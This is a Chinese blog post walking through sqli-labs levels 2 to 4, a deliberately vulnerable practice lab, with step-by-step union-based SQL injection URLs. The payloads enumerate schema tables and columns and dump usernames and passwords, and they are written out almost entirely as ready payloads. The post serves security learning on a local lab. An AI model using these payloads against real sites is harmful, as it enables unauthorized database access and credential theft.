安科网

sqli-labs-master 第二关+第三关+第四关

sixyearsorless

sixyearsorless

2020-05-07

关注 关注

sqli-labs-master 第二关+第三关+第四关

实验2

1. 判断注入点
http://localhost/sql/Less-2/?id=1
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到数字里
2. 判断ID类型
http://localhost/sql/Less-2/?id=0 and 1 = 1
显示正常,我们可以知道ID类型是数字类型
3. 猜测匹配列数
http://localhost/sql/Less-1/?id=0 UNION SELECT 1,2,3 %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-2/?id=0 UNION SELECT 1,username, password from users limit 5,1 %23

实验3

1. 判断注入点
http://localhost/sql/Less-3/?id=1‘) %23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到(‘中
2. 判断ID类型
http://localhost/sql/Less-3/?id=0‘) and (‘1‘)=1%23
3. 猜测匹配列数
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-3/?id=0‘)  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,username, password from users limit 5,1 %23

实验4

1. 判断注入点
http://localhost/sql/Less-4/?id=1"%23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到("中
2. 判断ID类型
http://localhost/sql/Less-4/?id=0") and ("1")=1%23
3. 猜测匹配列数
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-4/?id=0") UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-4/?id=0")  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,username, password from users limit 5,1 %23

select sql注入 localhost less sql数据库

sixyearsorless

sixyearsorless

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

sql注入 --显错注入

jiong 2020-09-17

SQL 创建、更新和删除视图的方法

视图是可视化的表。本章讲解如何创建、更新和删除视图。视图包含行和列,就像一个真实的表。您可以向视图添加 SQL 函数、WHERE 以及 JOIN 语句,也可以呈现数据,就像这些数据来自于某个单一的表一样。视图 "Current Product L

whyname 2020-08-16

sql优化的几种方式

= 或 <> 操作符不会使用索引,而对于 < 、 <= 、 = 、 > 、 >= 、 BETWEEN AND,数据库才会使用索引。因此对于上面的查询,正确写法应该是:select name from table wher

明月清风精进不止 2020-07-05

SQL语句优化的理解

然后是某一条SQL 语句一直执行的很慢,可能的原因有没有用到索引,例如该字段没有索引;由于对字段进行运算、函数操作导致无法用索引,或者是数据库选错了索引。这种情况是我们要关心的,需要进行SQL语句的优化,简单来说就是该用索引就要用索引,避免全表扫描。

URML 2020-07-04

SQL 语法:一些最重要的 SQL 命令简介

一个数据库通常包含一个或多个表。每个表有一个名字标识,表包含带有数据的记录(行)。在本教程中,我们在 MySQL 数据库中创建了 Websites 表,用于存储网站记录。| id | name | url

CSDN0BLOG 2020-06-21

SQL 的服务器端编程---T-SQL简介

Transact-SQL 的缩写为T-SQL,T-SQL是Microsoft 公司的SQL Server的数据库语言,它是对标准SQL语言的扩充。数据库中的数据通常需要定义一个数据类型,不同DBMS具体支持的数据类型大体相同,稍有差异,具体可参阅相关手册。

goodriver 2020-06-17

Golang 定时器(Timer 和 Ticker),这篇文章就够了

Golang 原生 time 包下可以用来执行一些定时任务或者是周期性的任务的一个工具。本文基于 Go 1.14,如果以下文章有哪里不对或者问题的地方,欢迎讨论学习。定时器的日常使用。timer.Stop() // 这里来提高 timer 的回收。tCha

专注前端开发 2020-10-21

Mysql 实现字段拼接的三个函数

给运营导出数据时,难免需要对字段进行拼接,如果 Mysql 可以完成的话,就可以少些很多代码。不过如果有字段值为 NULL,则结果为 NULL。上面这种方式如果想要使用分隔符分割,就需要每个字段中间插一个字符串,非常麻烦。concat_ws() 可以一次性

苏康申 2020-11-13

详解 MySQL中count函数的正确使用方法

当搞清楚count函数的运行原理后,相信上面几个问题的答案就会了然于胸。为了解决上述的问题,我创建了一张 user 表,它有两个字段:主键id和name,后者可以为null,建表语句如下。`id` int NOT NULL AUTO_INCREMENT C

vitasfly 2020-11-12

oracle锁表该如何解决

where l.object_id = o.object_id and l.session_id=s.sid;如果杀不掉可以加个 immediate 立即杀掉 试试;如果利用上面的命令杀死一个进程后,进程状态被置为"killed",但是

oraclemch 2020-11-06

SQL Server如何通过创建临时表遍历更新数据详解

前段时间新项目上线为了赶进度很多模块的功能都没有经过详细的测试导致了生成环境中的数据和实际数据对不上,因此需要自己手写一个数据库脚本来更新下之前的数据。关于数据统计汇总的问题肯定会用到遍历统计汇总,那么问题来了数据库中如何遍历呢?好像并没有for和fore

liuyang000 2020-09-25

ThinkPHP5 链式操作table用法

table方法主要用于指定操作的数据表。用法一般情况下,操作模型的时候系统能够自动识别当前对应的数据表,所以,使用table方法的情况通常是为了:。需要注意的是table方法不会改变数据库的连接,所以你要确保当前连接的用户有权限操作相应的数据库和数据表。切

FellowYourHeart 2020-10-05

Orcle11G创建表空间,创建用户,授权等操作

CREATE USER caiyl IDENTIFIED BY 123456 DEFAULT TABLESPACE caiyl_space;GRANT CREATE USER,DROP USER,ALTER USER ,CREATE ANY VIEW ,A

赵继业 2020-08-17

oracle 日期操作语句总结

SELECT TO_CHAR AS YEAR FROM DUAL--查询当前年份。SELECT TO_CHAR AS MONTH FROM DUAL--获取当前日期的'YYYY/MM/DD'格式:2020/01/02. SELECT TO_CHAR AS

Seandba 2020-08-16

ORACLE数据库中Rownum用法详解

ORACLE 中ROWNUM用法总结!对于 Oracle 的 rownum 问题,很多资料都说不支持>,>=,=,between...and,只能用以上符号(<、<=、!=),并非说用>,& gt;=,=,betwee

dbasunny 2020-08-16

MySQL如何创建视图

可以使用 CREATE VIEW 语句来创建视图。该名称在数据库中必须是唯一的,不能与其他表或视图同名。用户除了拥有 CREATE VIEW 权限外,还具有操作中涉及的基础表和其他视图的相关权限。SELECT 语句不能包含 FROM 子句中的子查询。可使用

拼命工作好好玩 2020-08-15

详细分析mysql视图的原理及使用方法

在MySQL中,视图可能是我们最常用的数据库对象之一了。那么你知道视图和表的区别吗?可能很多人对视图只是一知半解,想详细了解视图的同学看过来哟,本篇文章会详细介绍视图的概念、创建及使用方法。当我们创建一个视图的时候,实际上是在数据库里执行了SELECT语句

langyue 2020-08-15

MySQL约束

分别查询男、女同学的平均分,人数 要求:分数低于70分的人,不参与分组,分组之后。

好记忆也需烂 2020-08-15

MySQL实现根据当前ID读取上一条和下一条记录

SELECT * FROM A WHERE ID < 5 ORDER BY ID DESC LIMIT 0,1; ps: select * from table1 where id<$id order by iddesc limit

写程序的赵童鞋 2020-08-03

mysql 14 覆盖索引+回表

MySQL可以利用索引返回select列表中的字段值。而不必根据主键再次读取聚簇索引数据文件查到数据,也就是平时所说的不需要回表操作。覆盖索引其实是索引覆盖的意思,索引字段就已经囊括select查询的字段,即索引字段覆盖了需查询的字段。t; 即id是聚集索

Accpcjg 2020-08-02
sixyearsorless

sixyearsorless

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号